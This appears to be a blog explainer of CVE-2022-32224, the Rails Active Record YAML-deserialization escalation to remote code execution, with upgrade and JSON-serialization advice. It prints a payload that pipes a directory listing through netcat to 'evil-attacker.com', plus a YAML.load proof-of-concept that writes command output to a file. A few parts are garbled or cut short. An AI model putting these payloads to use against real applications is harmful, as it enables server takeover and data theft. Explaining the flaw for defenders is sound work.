CVE-2022-32224 - Remote Code Execution Escalation via YAML Serialized Columns in Active Record (Rails)

---

If you use Ruby on Rails and Active Record with serialized YAML columns, this post is a must-read. A critical vulnerability—CVE-2022-32224—can let an attacker escalate from a simple data write (think SQL injection) all the way to running commands on your server. Read on for plain-language details, examples, and how to protect your app.

What is CVE-2022-32224?

Rails developers often use Active Record's serialize to store hashes or arrays in a database column. For example, you might have a column called settings that stores a YAML-encoded Ruby hash.

5.2.8.1

If an attacker can insert arbitrary data into the serialized column—commonly via SQL injection—Rails will deserialize *any* YAML, including objects that can trigger code execution (RCE) in Ruby.

Why is this Critical?

Active Record's serialize uses YAML to safely load data, but if the data isn't sanitized, YAML can deserialize dangerous Ruby objects. These objects can be crafted by an attacker to run system commands or exploit your server.

Apps using serialize without restrictions (default is YAML)

- Apps with any way for attackers to directly write to the database serialized columns (SQL injection, malicious admin, etc.)

Let's look at a simple Ruby model

class User < ApplicationRecord
  # settings is a text column
  serialize :settings
end

Suppose there's a SQL injection or other bug that lets a hacker set User#settings to any string. The attacker puts in a payload like:

--- !ruby/object:Gem::Installer
i: x
gem:
  post_install_message: "ls /tmp | nc evil-attacker.com 4444"

When Rails loads this record, it will deserialize the YAML payload. Some Ruby classes have “dangerous” behaviors in their initialization (see references about YAML Unsafe Load). If any of these can be exploited (think: arbitrary code execution via command execution), the attacker gets RCE.

Proof of Concept Exploit

Let's show a minimal local simulation. (Don't run this in production!)

require 'yaml'

malicious = <<-PAYLOAD
--- !ruby/object:Gem::Installer
i: x
gem:
  post_install_message: "id &gt; /tmp/hacked"
PAYLOAD

obj = YAML.load(malicious)

Warning: This *will* run code if the class targeted has dangerous methods in its deserialization path.

How to Fix CVE-2022-32224

1. Upgrade Rails/ActiveRecord

See the official advisory:

https://github.com/advisories/GHSA-65cv-r6x7-79hv

More References

- Rails Security Advisory - Possible escalation to RCE using YAML columns in Active Record
- OWASP: YAML Deserialization
- GitHub security advisory
- NVD entry CVE-2022-32224

Summary

If you use YAML-serialized columns in Active Record—and especially if your app is vulnerable to SQL injection or raw database input—you could be one deserialization away from a server compromise. Patch your Rails! Switch to JSON serialization. And review how you use serialize in your models.

Timeline

Published on: 12/05/2022 22:15:00 UTC
Last modified on: 12/08/2022 13:20:00 UTC